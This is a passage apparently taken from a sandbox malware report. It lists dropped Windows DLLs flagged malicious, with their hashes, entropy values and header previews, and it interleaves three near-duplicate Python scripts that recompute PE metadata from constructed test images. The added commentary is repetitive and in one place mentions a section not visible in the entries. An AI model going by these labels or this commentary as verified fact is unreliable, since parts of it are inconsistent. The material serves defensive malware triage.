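    """One record in the same shape as the report's dropped-file entries."""
    rec = {"File Type": pe_file_type(data), "Size (bytes)": len(data),
           "Entropy (8bit)": entropy_8bit(data)}
    rec.update(hashes(data))
    return rec


def build_minimal_pe(pe32plus: bool, dll: bool, gui: bool) -> bytes:
    """Constructed header-only PE image for testing; not a file from the report."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                   # e_lfanew: PE header right after DOS header
    opt_size = 112 if pe32plus else 96                          # optional header without data directories
    characteristics = 0x0002 | (IMAGE_FILE_DLL if dll else 0)  # EXECUTABLE_IMAGE [| DLL]
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x014C, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, 2 if gui else 3)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for key, value in describe(build_minimal_pe(pe32plus=True, dll=True, gui=True)).items():
        print(f"{key}:{value}")
```

Run against a real dropped file (`describe(open(path, "rb").read())`) the digests must match the record byte for byte; a mismatch means the artifact you hold is not the one the sandbox analysed, which is the first thing to rule out before trusting a reputation lookup on these hashes.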

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):39384
Entropy (8bit):6.360716101979744
Encrypted:false
SSDEEP:768:wxxqaJMOO9TC0Vj0FfdtJbAdPNlYimppFAMxkEly/:wxkaJKXIltGdll7mpvxxO
MD5:26B0A64CA2FAED0C689ED7C6F8243540
SHA1:834D1D32E833580185EF8D41FEBFDB6AC3A3C5FF
SHA-256:27C77D11B1BDAC5E86E39C81D0BBC928AAA6977DF2B0B14F765A49541A28C634
SHA-512:F0B15838AEEC8FEF87DDEEA9091B0581F97D118A5017639B8804FE9E1B4EFA09EB153AEC6D442C4EE47B1EB84F56DE24843C370F73D070D8573D739E3CFD840B
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...v...v...v..Nv...v...w...v...w...v...w...v...w...v...w...v...w...v...v..v!..w...v!..w...v!."v...v..Jv...v!..w...vRich...v........PE..d...._.f.........." .....>...\.......?.................................................... ......................................... d..l....d.......................p...)......H....T..p........................... U...............P...............................text....<.......>.................. ..`.rdata..|....P.......B..............@..@.data...0....p.......`..............@....pdata...............b..............@..@.rsrc................h..............@..@.reloc..H............n..............@..B........................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):134032
Entropy (8bit):6.570489921495016
Encrypted:false
SSDEEP:3072:vp/izzvTlS0eRHWMlLCjL/QNQ5fYNAI/E3:BcTlSZBLCjL/QNPN56
MD5:7C7F0913AB04A9AF8783D76DF338EDDA
SHA1:4E526E15E05BB6B5A902217B31B8D6EF36CAEE96
SHA-256:A9C28B91E4ED90D620F554ABE21B278310C451BB36A1A5B338C673BE7FE9C95C
SHA-512:CA5C1E29D7381754814FE155CC3BF9347D07944CBDA3062B24571546252235434AE107033B8EF80A9791074146D4E3EE691EF06F5657EE52ABF8188B7B53E5BD
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y59..TW..TW..TW.k.,..TW..,...TW..,...TW..TV.TW..,...TW.k.:..TW..,...TW..,..YTW.:.)..TW..,...TW..,...TW.Rich.TW.........................PE..d.....Z.........." .........0............................................... .......N....@.........................................@...x.......P......................../...........................................................................................text............................... ..`.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3240016
Entropy (8bit):6.26282805728618
Encrypted:false
SSDEEP:49152:BejAIBTJv6nAMdFx5xpRJxZpg3aIxj2oT6VIZ7nhzyeHW3KCgv+UD:cTaoTNtas
MD5:53EDB26B10553B11B83B4D6C00295827
SHA1:7570619EB7B0734569FA74AF89A5A1CED5B169D2
SHA-256:F8D56534C9304F583FF38A2CADE06D5E643A08A4161FF8C4BABDA2E9EBA99A8B
SHA-512:BFC14952A0B1E0DDA2E02E03107703EAA21F7C27BC25B1180DC7D0C908AE75689FD6C7788081BF76DE8444D8A7C65D70122A2F2A4F84D263A4D720B1D514D395
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o..A..A..A..f._.@..Hv\....f..@..Hv[.5.._\[.D..7...@..f..P..A.....HvJ.L..HvU....HvM.@.._\K.@..A.H.@..HvN.@..RichA..........PE..d....2 f.........." .....(....................................................1.......1...@......................................... [).N....H)......`-.t....@,......F1.P*... 1..a...F...............................................@...............................text....&.......(.................. ..`.rdata..n....@.......,..............@..@.data........`)......H).............@....pdata.......@,.......+.............@..@.rsrc...t....`-.......-.............@..@.reloc..(.... 1.......0.............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):21
Entropy (8bit):3.8442328987631917
Encrypted:false
SSDEEP:3:WIVKLTpn:PgL1n
MD5:4FDD914244F257BA902260A7B65D05AE
SHA1:BE047B70DF80783B6693C88CEF7233CD86C7A2A3
SHA-256:CFF791C25B17603124B6B549A29963B3D0B771CB6ECC19002DE16A132F7EBACC
SHA-512:0938F16F3D681A30E9861E59EFCDE5C89E4F04D04DE2F457337032AC6D1E228B92E4489B8B45F0404A14179D08473719E2ACC4DDB4E8E8F782B66AB89EF633FF
Malicious:false
Preview:HWComponentPlugin.dll

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):113928
Entropy (8bit):6.140409022305705
Encrypted:false
SSDEEP:3072:xSrLvDkvN4UPAOfMEHJNt9UtNFsgTMfwSNY2jgXs:xSPrklAOkEDwSN1gc
MD5:3B3BCDFBAAA9A2066A6701F6231DA621
SHA1:B57F487D41BF6A673312D82C4595F54C1797144A
SHA-256:233FB3277DB50ABDA86838B0691E10CF321180711ED345A46D631979B99501A2
SHA-512:8194166C044A441D8AD7A781B36C80DB2F9E3E909CC9186BCF902EE8D331FB494BAFEB3090018159CBEC8FC3360F879A3EB710BFE2C000D20301C61E9777D990
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qV.M.8.M.8.M.8.(v<.G.8.(v;.H.8.(v=...8..x=.h.8..x<.C.8..x;.E.8.(v9.J.8.M.9...8..y1.O.8..y8.L.8..y.L.8.M...L.8..y:.L.8.RichM.8.........................PE..d......a.........." ................\.....................................................`..........................................y.......z..P........................%......(... e..p............................e..................p............................text............................... ..`.rdata..............................@..@.data................p..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91024
Entropy (8bit):6.392450329332899
Encrypted:false
SSDEEP:1536:CyPVy+3gUqzIEC5iSx7ZsXxl42FOqYI3/Wc3+OBX6PzcZfjZmK84WBo/7PX:NPVy+wUotj3YIvWc3+AXezcBgK84WBor
MD5:37167182BE8130CD2ADD9E8965009930
SHA1:9A4DCDBB3CE44FF3452032E90967E11C2A28A79D
SHA-256:E368064B5C5949CED5A9874885D8D3E98FBCDA0E3D6FD603332AA6315528AF9B
SHA-512:9B8072EB3D4D8F3D6D29DFD0B42D493F3F4CAC62E7EDA2B85D5BD649B460C34E5B1936AC8C513A09D90CE7976D6C62F1B6B3281B292FBC042282C1AECB9EE8CD
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^...5...^..+...^..+...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l...............................................p............`.............................................`...0...,....P.......@..H....4.../...`...... ...p...............................8...............X............................text............................... ..`.rdata...L.......L..................@..@.data...8....0......................@....pdata..H....@....... ..............@..@.rsrc........P.......0..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2114144
Entropy (8bit):6.918228682265098
Encrypted:false
SSDEEP:49152:mUWHHB5ALYCtKkV8+JuKCTboKx7JQMFJZ:mUWHHB5xCtKkV8+JMbo8FL
MD5:CBEA799E76C3FBA37E66AF0476A178C5
SHA1:A81BFE177A7D8DDA0E5A8B2F9A91E92A975518CD
SHA-256:E263D4644A3779817B9A83714EC70CDFF3827BA220D63C0AA0BCCFE85A2B41F4
SHA-512:0619C358C87AA8BD46A13CB4CEC30482F789C522BF2ED993E80C67F7B5D20579C86A18056F625BDAC6C572EA5477B7F876CFBF5CE193EA85DCC55AE33F8A0E69
Malicious:true
Preview:MZ......................@.......................................VLV....... ..%Ng4a)L.W.[r..m...f.b..l.`.R6,-|.. ....7........CvV.<<...+........2...]..-.B&n_.E.._.v?..!...J......l.v....U.........T............................................................PE..L....%Ng...........!...(.J..........B........`...............................p ....... ...@.........................p........v.......@..\............. .`,...P.. ...0...T...........................p...@............`..l............................text....H.......J.................. ..`.rdata..<6...`...8...N..............@..@.data............v..................@....rsrc...\....@......................@..@.reloc.. ....P......................@..B................................................................................................................................................................................................................................................................................................
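Each dropped-file entry above carries a File Type string, an Entropy (8bit) value, the four digests and a byte preview of the PE headers. The script below is an added example and is not code from the Joe Sandbox report; it shows how those fields are derived from the raw bytes, so the same values can be recomputed on a file pulled from the analysis VM or matched against a sample from another source. File Type is built from the DOS header, the PE signature, the COFF Machine and Characteristics fields, and the optional-header Magic and Subsystem (the "L" and "d" visible right after "PE.." in the previews are the low bytes of Machine 0x014C and 0x8664, which is how the report tells Intel 80386 from x86-64); Entropy (8bit) is Shannon entropy in bits per byte; the section names (.text, .rdata, .rsrc, and the .00cfg seen in the first entry) come from the section table. describe_pe() only emulates the libmagic wording the report uses, and the images returned by build_minimal_pe() are constructed headers-only test inputs, not the report's samples. Worth noting in the entry immediately above: its preview lacks the usual "This program cannot be run in DOS mode" stub text and it has the highest entropy of this group (6.92); neither fact alone proves the DLL is packed, but together they are a reason to look at it before the others.

```python
"""Recompute the per-file fields of a sandbox 'dropped files' table (File Type
from the PE headers, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512, section names).

Added example; not code from the sandbox report. The images returned by
build_minimal_pe() are constructed, headers-only test inputs, not the report's
samples, and describe_pe() only emulates the libmagic wording the report uses."""
import hashlib
import math
import struct
import sys
from collections import Counter

# Constants from the PE/COFF specification.
MACHINE = {0x014C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "Aarch64"}
SUBSYSTEM = {1: "native", 2: "GUI", 3: "console"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_DLL = 0x2000
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant file, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the table lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def _coff(data: bytes):
    """Locate the COFF header via e_lfanew; returns (coff_offset, machine, nsections, opt_size, characteristics)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symptr, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    return coff, machine, nsections, opt_size, chars


def describe_pe(data: bytes) -> str:
    """Build the 'PE32+ executable (DLL) (GUI) x86-64, for MS Windows' style string.
    PE32 vs PE32+ comes from the optional-header Magic, DLL from Characteristics,
    GUI/console from Subsystem (at offset 68 in both optional-header layouts)."""
    coff, machine, _n, opt_size, chars = _coff(data)
    if opt_size < 70:
        raise ValueError("optional header too short to hold Subsystem")
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    fmt = {PE32_MAGIC: "PE32", PE32PLUS_MAGIC: "PE32+"}.get(magic)
    if fmt is None:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    kind = "(DLL) " if chars & IMAGE_FILE_DLL else ""
    sub = SUBSYSTEM.get(subsystem, f"subsystem {subsystem}")
    arch = MACHINE.get(machine, f"machine {machine:#06x}")
    return f"{fmt} executable {kind}({sub}) {arch}, for MS Windows"


def section_names(data: bytes) -> list:
    """Names from the section table (the .text/.rdata/.rsrc strings seen in the previews)."""
    coff, _m, nsections, opt_size, _c = _coff(data)
    table = coff + 20 + opt_size
    return [data[table + 40 * i:table + 40 * i + 8].rstrip(b"\0").decode("ascii", "replace")
            for i in range(nsections)]


def build_minimal_pe(pe32plus=True, dll=True, subsystem=2, machine=0x8664,
                     sections=(b".text", b".rdata")) -> bytes:
    """Constructed headers-only PE image for testing (not loadable, contains no code)."""
    e_lfanew, opt_size = 0x80, 240 if pe32plus else 224
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    chars = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if dll else 0)
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC if pe32plus else PE32_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    table = b"".join(name.ljust(8, b"\0") + b"\0" * 32 for name in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


def analyze(data: bytes) -> dict:
    """All table fields for one file; File Type falls back to 'data' for non-PE input."""
    try:
        ftype, sects = describe_pe(data), section_names(data)
    except (ValueError, struct.error):
        ftype, sects = "data", []
    return {"File Type": ftype, "Size (bytes)": len(data),
            "Entropy (8bit)": shannon_entropy(data), "Sections": sects, **hashes(data)}


if __name__ == "__main__":
    # Usage: python pe_fields.py <dropped-file>; with no argument it analyzes the constructed image.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    for key, value in analyze(blob).items():
        print(f"{key}:{value}")
```

Run it against the actual dropped file to confirm the SHA-256 and entropy match the table before trusting a report copied from elsewhere; a mismatch in entropy with matching size usually means the file was modified in transit or a different build was substituted.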
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3214200
Entropy (8bit):6.531654093710658
Encrypted:false
SSDEEP:49152:d9sfqCrqDuv0LMdajQJVAXV3VWdrm054uABaPBNrJbhgOlbHNjolJPHabUa7anV:zAdv8qkV3VWX4uABaPBDddlrhxanV
MD5:EDF89B539F5EF3D8BA8BD3B9A8560DAA
SHA1:A28E079D5C1909E7C8F084CCE00BA2EB7779A444
SHA-256:65A8F6078E18E23833FBFB2C2BC635977FE536E0A45425EC57E957AB88FCBE27
SHA-512:EDFA8A0C0FAA0E89EC03E191EFF688EE475324B4F16164F45AC0278B64BC1A4771776A160E48004721321870A858916BB9DFE21DF7BC4E08E8C9DEE94F538856
Malicious:true
Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......h`..,.y.,.y.,.y.8j}.9.y.8jz. .y.8j|...y.8j..-.y.~t}.#.y.~tz.&.y.~t|.D.y.Jn....y.s}.-.y.hz.-.y.h|...y.p|...y.8jx.?.y.,.x...y..tp.>.y..ty.-.y..t..-.y.,...-.y..t{.-.y.Rich,.y.........................PE..d......f.........." .....,&...........!......................................p1.......1...`...........................................-..$..T>....... 1......`/.X.....0.x)...01.t6..0.).p.....................).(.....).8............@&..............................text....*&......,&................. ..`.rdata.. ....@&......0&.............@..@.data........`.......F..............@....pdata..X....`/.....................@..@_RDATA........1.......0.............@..@.rsrc........ 1.......0.............@..@.reloc..t6...01..8....0.............@..B................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59280
Entropy (8bit):6.661684357969902
Encrypted:false
SSDEEP:768:EXDrY/MBgXY3MEYTn8V8GyMODlOcCUuPtxFDSpcfj07Lap4G0czcoYiYa2vC6AMB:k/Y1Y31YT8VmUXPzfj6/Grzco7VKxn
MD5:1F56DEE8B92CD70362E61A54175A4D5A
SHA1:0E4699EED2F03A7BCCC70199F532170C7F46BFBD
SHA-256:6B22D65A71AA2157AB6D6AC55DD1187C5F08C002CE0DDA55917A6E389222256B
SHA-512:65A1EFF33377B7B1D144835F441FDAE332FC36964B8FB6194EB2208A5BF0EFE4DA7EA14841049286137014333BFF760B8659B8BFBE063AD3D87B00182E7A7168
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.....................:....................8....s8..........s.....s9......>....s;....Rich...........PE..L.....*f...........!.....d...Z.......i....................................................@.................................h...........h................)..........p...8...............................@...............4............................text....c.......d.................. ..`.rdata...?.......@...h..............@..@.data...l...........................@....qtmetad............................@..P.rsrc...h...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):91536
Entropy (8bit):6.371649857861497
Encrypted:false
SSDEEP:1536:LYCac2bicLxU3E63UGiH7ZA5Mx54nI7lPOvULd7dvqffKcHKz+YG5/7WF:LYCac2biQxBxDhWvULdRvq3KcHKDU/6F
MD5:9BE4224D9DFB51972CBAF13E635926A3
SHA1:99174B120E1BC033EE74E4BE3063F6C224E5D5C8
SHA-256:72608B9F5FF32688B6C65258A525826407839AA6BC3D60E6ADE9A5AF370DD505
SHA-512:B0E5222EB601D3F2217F9219238BD1FB406987E30BDFB13EB9915DCC6747CF835CBA094952A3A5C756B52F3C9E2D26E83E3E66D9BC88BE380A33457D8DE9FB24
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?...^...^...^...&|..^..+...^..+...^...5...^..+...^..+...^...5...^...^..R^..6+...^..6+...^..6+...^..6+...^..Rich.^..........................PE..d......b.........." .........l......4........................................p......8T....`.............................................X...(...,....P.......@..<....6.../...`..........p...............................8...............X............................text............................... ..`.rdata...K.......L..................@..@.data...H....0......................@....pdata..<....@......."..............@..@.rsrc........P.......2..............@..@.reloc.......`.......4..............@..B................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):93232
Entropy (8bit):6.49985673199024
Encrypted:false
SSDEEP:1536:a2b7ppEkfpM8VfuwD/cPkgN/zf/vZ76FsWFcdlOrdYz7F9WWiAHrR:NHkYpM2uwD/cPNjhHlOZYz7F9WWiALR
MD5:B95FCEF92642932A9992D13E256C571C
SHA1:CB218CF9025B02657A06ECD409EDE09A3007FBC3
SHA-256:51DF7F062D158CFFA5748249C6C4B0B3C9B75D03830AFD1B0D2D593941A917B0
SHA-512:69AE204A24784F5D6FA63CCAF6E04128DB9DF5F823E903CD85F1B66B67A04F4A90DC37C3815B5BE7437021816BC230B5B9E35641B6A3AC5F5D23F0927FA48AE3
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................=........................................"......"......".......q...."......Rich....................PE..L......a...........!................................................................&_....@.........................@6.......6..P....`...............H..0$...p.......+..p............................+..@...............,............................text............................... ..`.rdata..Z].......^..................@..@.data........@.......*..............@....rsrc........`.......4..............@..@.reloc.......p.......8..............@..B........................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2704896
Entropy (8bit):5.925433873080991
Encrypted:false
SSDEEP:49152:IIj+xNMJhwcQ7+a5DypU6C1w4pIIt8pZ6e0g1CPwDv3uFfJsg:p+MRQ2pDCCHIt8p1CPwDv3uFfJ
MD5:A3F468A033C802C94DAA8E0BD9DC4C7A
SHA1:2041D719D63FA7455B15A8168B6C362B7D6F4EAB
SHA-256:B1F985116F7C8BE9B022F35213CE1F48B2C640AB2DD0D080A80DBAA42437B25A
SHA-512:1CE7AE7C29837347FD770C867F8AE6566AF76B68840B08A9F6F9C51026251689ED2FE66B00B3F4EE6F4D103DF0A4B02911ED50A905E60750631306B42E89BF65
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..............q+......q........$........./....q)......q..9....q,......q-......q*.....Rich............................PE..d...*.6`.........." ................T.........................................)...........@.........................................@s$..h... )......@).|....`'.............P).pN..P................................................()..............................text...V........................... ..`.rdata..[...........................@..@.data....u....&..*....&.............@....pdata.......`'.......&.............@..@.idata....... ).......(.............@....rsrc...|....@).......(.............@..@.reloc...o...P)..p....(.............@..B................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):527320
Entropy (8bit):6.22744816940077
Encrypted:false
SSDEEP:12288:+PaSEq5lUX1rPekNDSa98OOeOJrigKDdfAWPuLvH6p+g967teje:+N581rPekNDSa98OOeOJriTfTWLvap+d
MD5:40D9C2903AE6095C3DCF4EC8D92165E0
SHA1:F60ED95B66DE812D1074731A4CCD8086162095CE
SHA-256:824D165E9C147B0EB0628086F24F35A2C84BCDD923217537F65CD9881A415724
SHA-512:71E8F0B6B4F6F4F086026E7A0DBAFC5031BACEEEB3BBB6D14049EC2804AAF6A5077D0A93C31D79684C9D2BFBB11DECEEA0CE48AF9BCF5703F19F61101EC02309
Malicious:true
Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.........H+O.&xO.&xO.&xF.x..&x.. yN.&x.."yG.&x..%yK.&x..#yn.&x..'yI.&x)..xM.&x..'yM.&x..!yN.&x.."yN.&x..'yA.&x..'yM.&x..'yL.&xO.'x.&x..#yK.&x../yG.&x..&yN.&x...xN.&xO..xM.&x..$yN.&xRichO.&x................PE..d....`.f.........." .........8.......M....................................... ......+i....`.........................................`O......<P..p...............\7.......)......$...`...p.......................(......8...............`............................text............................... ..`.rdata..............................@..@.data....&....... ...~..............@....pdata..\7.......8..................@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):139624
Entropy (8bit):6.1983818318989234
Encrypted:false
SSDEEP:3072:JM7Ef/ppaPmj51IxIAyBoKXVJpw5MWxRdd7FiQ/2x/:G7ybhYIAXKNwJxxN4
MD5:B0043B40E915D1A10FEF14A95C4E7F54
SHA1:CAE2D1DB34D64B4C043190E0106A0018BA0918AC
SHA-256:5FB3E9634343CB9F5052A310BE6C6E398B11AB0CCEE55B60D0D80F6CD24911C9
SHA-512:C0A8C234EBABAEC671A3CAA65F3304CBD5C2176CC92EB10520ADAC4600253F0A9B8DAF5302A7185244EFC4D604D722218CD2EA9368403754FAE31AAB3EF56D32
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._.Zy..4*..4*..4*~.0+..4*~.7+..4*~.1+..4*~.5+..4*..5*F.4*I.1+:.4*I.0+..4*I.7+..4*..=+..4*..4+..4*...*..4*...*..4*..6+..4*Rich..4*................PE..d...rU%d.........." .................S.......................................@......+6....`.............................................l.......<.... ..................h/...0..L......p...........................@................0...............................text............................... ..`.rdata.......0......................@..@.data...4...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..L....0......................@..B................................................................................................................................................................................................................................
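Most columns in the dropped-file entries above are derived from the file bytes alone: the four hash digests, the 8-bit entropy, the libmagic-style File Type string (PE32 vs PE32+, DLL flag, GUI/console subsystem, machine), and the section names that are legible in each Preview (.text, .rdata, .data, .pdata, .rsrc, .reloc, .qtmetad, _RDATA). When a dropped file is pulled out of the sandbox for triage, recomputing those values is the quickest way to confirm the artifact matches the report and to read the link timestamp that the PE header carries. The Python below is an added example and is not part of the Joe Sandbox report or of the analysed sample; it parses a constructed, header-only PE image rather than any file listed here, and the function names (`build_sample_pe`, `parse_pe`, `describe`, `triage`) are the example's own. The SSDEEP column is left out because it needs the ssdeep library, which is not assumed.

```python
"""Recompute dropped-file metadata (hashes, entropy, PE type, sections,
link timestamp) from raw bytes. Added example; the input is a constructed
header-only PE, not a file from the report."""
import hashlib
import math
import struct
from collections import Counter
from datetime import datetime, timezone
from typing import Optional

IMAGE_FILE_DLL = 0x2000
MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64"}
SUBSYSTEMS = {2: "GUI", 3: "console"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0, 8]; matches the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_hashes(data: bytes) -> dict:
    """Upper-case hex digests for the four algorithms the report lists."""
    return {name: hashlib.new(name, data).hexdigest().upper()
            for name in ("md5", "sha1", "sha256", "sha512")}


def parse_pe(data: bytes) -> Optional[dict]:
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> COFF -> optional header -> section table.
    Returns None for anything that is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    coff = e_lfanew + 4                      # 20-byte COFF file header
    machine, nsections, timestamp, _, _, opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, coff)
    opt = coff + 20                          # optional header starts here
    magic = struct.unpack_from("<H", data, opt)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32 and PE32+
    sect = opt + opt_size                    # 40-byte section headers, 8-byte names
    names = [data[sect + 40 * i: sect + 40 * i + 8].rstrip(b"\0").decode("ascii", "replace")
             for i in range(nsections)]
    return {
        "format": OPTIONAL_MAGIC.get(magic, f"unknown magic 0x{magic:X}"),
        "machine": MACHINES.get(machine, f"0x{machine:04X}"),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "sections": names,
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
    }


def describe(data: bytes) -> str:
    """Render the File Type string the way the report does."""
    info = parse_pe(data)
    if info is None:
        return "not a PE image"
    kind = f"{info['format']} executable" + (" (DLL)" if info["is_dll"] else "")
    return f"{kind} ({info['subsystem']}) {info['machine']}, for MS Windows"


def triage(data: bytes) -> dict:
    """One record in the shape of the report's dropped-file entries."""
    rec = {"size": len(data), "entropy": round(shannon_entropy(data), 6),
           "file_type": describe(data)}
    rec.update(file_hashes(data))
    info = parse_pe(data)
    if info:
        rec["sections"] = info["sections"]
        rec["link_timestamp"] = info["timestamp_utc"]
    return rec


def build_sample_pe(pe32plus: bool, dll: bool, section_names, timestamp: int) -> bytes:
    """Constructed header-only PE (no code, no imports); enough for classification."""
    opt_size = 0xF0 if pe32plus else 0xE0
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)  # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x014C, len(section_names),
                       timestamp, 0, 0, opt_size, 0x0002 | (IMAGE_FILE_DLL if dll else 0))
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<H", opt, 68, 2)       # IMAGE_SUBSYSTEM_WINDOWS_GUI
    sections = b"".join(n.encode().ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections


if __name__ == "__main__":
    sample = build_sample_pe(True, True, [".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc"],
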